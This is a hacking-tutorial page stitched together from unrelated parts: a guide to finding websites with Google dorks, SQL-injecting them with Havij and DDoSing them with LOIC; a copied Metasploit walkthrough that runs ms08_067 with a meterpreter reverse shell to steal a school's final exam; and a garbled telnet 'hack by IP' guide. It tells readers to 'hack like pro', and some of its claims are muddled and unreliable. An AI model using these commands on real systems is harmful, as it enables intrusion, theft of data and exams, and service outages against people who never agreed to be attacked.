WE give you knowledge step by step just read and do what we say.
Step 1: Identifying
The Hacktivists first identify their target website which they want to attack upon. They first qualify the website, according to the vulnerability level, they wish to attack. Checking the vulnerability of the website allows the hacker to prepare tools and techniques required to bring down the website.
Hackers generally use Google Dork, or Google Hacking, to execute a vulnerability check against these easy-to-hack websites. It was very recent that a hacker posted a list of 5,000 such websites which were really easy to be attacked. If they don’t wish to Google it out, they can Bing it. This tool is heaven for hackers as it helps in qualifying such websites.
Hackers have a ready-to-refer index of Dorks which points out the websites having a particular vulnerability. Right from passwords to Login credentials, there is Dork available for everything. They would Google “intitle:”Index of” master.passwd” which will return them a file containing the passwords and then they have the list of potential victims ready with them to execute the hack.
Step 2: Spotting the vulnerabilities
Acunetix – a Windows based application to test the website – developed by a UK based company, was designed and is still in prominent use by developers to test the vulnerabilities in the website, but the technical expertise of hackers to this tool allows them access to point out the weakness levels of the website. Once the site is identified for attack, this tool is used by hackers to check the vulnerability of the website, as all websites qualified in level 1 may not be susceptible to attack.
Since the hackers have in-depth knowledge of the above mentioned software, they can not only crack the version from a trial one, but the cracked version is also available freely amongst the hacker community. Once they enter the URL or website address in this software they are able to point out the loopholes in the website and all they do is, move to step 3.
Step 3: The Attack on the website – SQL Injection
The SQL injection is the easiest and the most used way by hackers to hack into a website. It is used by hackers to hack into user accounts and steal information stored into its databases. This attack aims at information stealing using some lines of code of SQL (Structured Query List) which is a database programming language. The hacker’s don’t even have to learn the language for this attack, as there is an available software called “Havij” in the hacker forums where it is available free of cost. It comes as an easily useable application. Havij is originally a development from Iran. The word itself means carrot, a bad-slang for the word penis, ultimately meaning that the hack-ware helps penetrating a website.
Havij has 2 versions – paid and unpaid, both of them differential in powers of penetrating, although the paid version can be cracked and downloaded from other hacker forums. The interface of this software completely simple like any other windows application, which does its work when a newbie hacker just copies the link of the website needed to hack and pastes it into the application.
The tasks Havij can perform are very surprising. The best one for them and worst for the users of the website is called “Get”. It fetches all the data stored in the target website’s databases which range from usernames, passwords to phone numbers and bank details.
It is so easy for hackers that within a couple of minutes of their time, in which they can search, download, and use one or two automated hack-wares that allows them to access websites which are vulnerable to such attacks. Very much assured, that the websites of high profile companies like Google, Microsoft and Facebook are completely safe from such tools. As mentioned before, the vulnerability of the web is displayed by the attack made on Sony’s PlayStation Network which led to the leaking of their customers’ personal information in a very similar way.
Step 4: The DDoS – The A Game
SQL Injection has been used by the infamous hacktivist community – Anonymous for over a year now, but they tend to go forth with the DDoS when simple tools like the Havij don’t work. Again like the SQL (pronounced Sequel) Injection attack there are freely available tools for the DDoS as well.
As it appears, the DDoS is also as simple as the SQL Injection attack. The program used here is called the Low Orbit Ion Cannon (LOIC), which was brought to life by web developers for stress testing their own websites, but was later hijacked by hackers to attack the websites for non-social use.
The LOIC is available to the hackers freely on the website Source Forge. Again as simple as the Havij, the hackers just have to type in the link of the website they want to DDoS and the application does the rest. LOIC overloads the server of the target website with upto 200 requests per second.
Now again, the bigger websites can easily cope up with this type of an attack without crashing, most of the other websites cannot. Surely if a group of hackers, although newborn, dedicates itself to the job, it is very easy for them to complete it.
This type of technology horrifies the readers, but it is very simple to use by the hackers that they can even control it from their phones, meaning that they could well be watching a movie with their buddies in the cinema while attacking the website they want to bring down.
This is not an exhaustive list and processes how the hackers execute the act but there are many a tutorials on various hacking forums that teach how to perform the attack. There is no end to this notoriousness, in many cases a heinous crime, which has caused a loss of millions and millions of dollars to the world. So are you going to get your website checked through your developer today? May be today would be a real good day to get it done.
ITS ONLY THE FIRST STEP THAT YOU MUST HAVE TO KNOW.
NOW YOU CAN HACK LIKE PRO
WARNING (Disclaimer):Of course, this is for demonstration/entertainment purposes only. Please do not break into your school's server and steal exams as it's illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.
Step 1Find That Proper ExploitThose of you with experience with Metasploit, or have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.
In our case here, our school is running a Windows 2003 Server that stores all the department's exams and records. So, let's use the/exploit/windows/smb/ms08_067_netapi. To find it, type:
- msf > search ms08
- msf > use /exploit/windows/smb/ms08_067_netapi
- msf > set payload /windows/meterpreter/reverse_tcp
- msf > show options
- msf >set LHOST 192.168.1.114
- msf >set RHOST192.168.1.108
- msf > exploit
- meterpreter >idletime
Once we're safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let's type lpwd (both pwd and lpwd will work).
Meterpreter responds with the / symbol indicating that we're in the root directory.
Step 6Find the Final ExamsWe can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That's probably where the exams are! Let's change directories to Concord University:
- meterpreter c:\\ConcordUniversity
Now we're in ConcordUniversity, we can get a directory listing by typing:
- meterprter > ls
- meterpreter > cd biology
Step 7Download the FinalMeterpreter has a built-in download feature, so all we need to do is type:
- meterpreter > download C:\\biology\exams\FinalExam
When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!
Now we are guaranteed a 95% (don't get a 100%, the instructor will be suspicious). If you have any questions, feel free to ask in the comments, or head on over to theNull Byte forum if you have questions on hacking topics unrelated to this article.
Hack a computer with its ip adress omly?????//////
Steps to Hack IP Address:
1) Prepare the IP address of the Victim. (e.g : 101.23.53.70 )
2) Download and Install Advanced Port Scanner.
3) Open Advanced Port Scanner and Type the IP Address in the right column and Click Scan.
4) It will lists you all Opened Ports of the Victim’s PC or Router. (e.g : Port 91 )
5) After retrieving the IP address and the Opened Ports of the Victim, Open Command Prompt (CMD)
and Type: telnet [IP ADDRESS] [PORT]
e.g : telnet 101.23.53.70 91
6) Now you’ll be asked to Enter Login Information, Just type Username and Password and hit Enter.
If no password is used just type the Username.
Done! Now you’ll get access to all Victim’s Files and Documents by browsing with CMD (use cd, copy, delete, mv… to do all tricks.)
|